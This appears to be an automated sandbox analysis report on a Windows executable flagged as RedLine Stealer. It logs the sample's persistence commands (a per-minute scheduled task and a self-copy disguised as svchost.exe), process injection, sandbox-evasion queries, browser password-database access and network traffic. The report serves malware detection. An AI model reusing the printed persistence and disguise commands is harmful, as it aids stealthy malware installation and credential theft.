                    Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_054DDE101_2_054DDE10
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_054DD2F01_2_054DD2F0
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E84401_2_065E8440
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E88781_2_065E8878
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065E15A81_2_065E15A8
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 0_2_00F88220 CreateProcessAsUserA,0_2_00F88220
                    Source: workalone.exe, 00000000.00000002.267079536.00000000029F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000000.262909550.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #l,\\StringFileInfo\\040904B0\\OriginalFilename vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs workalone.exe
                    Source: workalone.exe, 00000001.00000002.410486785.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs workalone.exe
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: svchost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: workalone.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\workalone.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exeJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE6B7.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/29@5/1
                    Source: tmp1B45.tmp.1.dr, tmpE6B7.tmp.1.dr, tmpB641.tmp.1.dr, tmpB611.tmp.1.dr, tmp8319.tmp.1.dr, tmp82DA.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: workalone.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\workalone.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
                    Source: workalone.exe, u0087u0003/u0095u0003.csCryptographic APIs: 'CreateDecryptor'
                    Source: workalone.exe, u0087u0003/u0095u0003.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.csCryptographic APIs: 'CreateDecryptor'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.csCryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: workalone.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: workalone.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 0_2_00F81C57 push ebx; iretd 0_2_00F81C7A
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.585773646811085
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.585773646811085

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 46539
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: unknownNetwork traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5660Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\workalone.exeWindow / User API: threadDelayed 9525Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: workalone.exe, svchost.exe.7.drBinary or memory string: objectmethodInvokenhffskdsfkdddafrffddhfscffdfhkgfsfdfdfhddrfahddsshcfchfdgeffkdafsfddhdshdghfBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresulthfsdkfdhgfshsefdfafffdchfhhfgsffrffdkdfcdshhfdasdfhfcfhdgadfdfrsfsshdkfffghhjfdffhfgadsfcrddfffskhjfsfhrgddddffffkhsjdfjsdfcfddshdfgfedfkfghjsddddffsheghddjffffffgjskdgsfacsafpsfhjfkfhgfhjsrfhddfhffadsfsfhsscfgdbddfrjfsffhgdfafcfdssfkfhgjffchkffgahffsrddsfsfjjffadsfcfdggsdehfsgkffjjcfssadghfffrfddsdgkfffffchkfhrfdfdafgsssffjjffaffffdrdgfhcsdsgkffjjcfhdsfrfgfdsadfsdgkffffgdddfdsfdhfssfdghfhfssddssdfhfddfhhshsfddsdfsdfdshshsdsffdsdsdfsdfsfhsdhffsdssfsshddsfgfsafsdgfsdshsgsfsfdsdgssdaffadssgsfashdsfsgfssadfsdggasdsfdfshsggdsdfafaghssddfdafsadsfdsfsddsjdddfsdsfgdfgfsssdfhjfsdsafdfhgjffddddsgfdgsjsfsddfdfjdffafgdfddsfddjkfdssfdfsgfhfssjfsffdfgsjfadsffffdfhfsfsfsjsffsfdssdjdsdffffsskwssffssdvgsffffsdsgffssfddsxstartupInfoSkikgmgIdajdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdfshfsdhshhhgfdffffdfsfhsfdfsffhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType
                    Source: workalone.exe, svchost.exe.7.drBinary or memory string: hfsdkfdhgfshsefdfafffdch
                    Source: C:\Users\user\Desktop\workalone.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeCode function: 1_2_065EC798 LdrInitializeThunk,1_2_065EC798
                    Source: C:\Users\user\Desktop\workalone.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\workalone.exeMemory written: C:\Users\user\Desktop\workalone.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exeJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
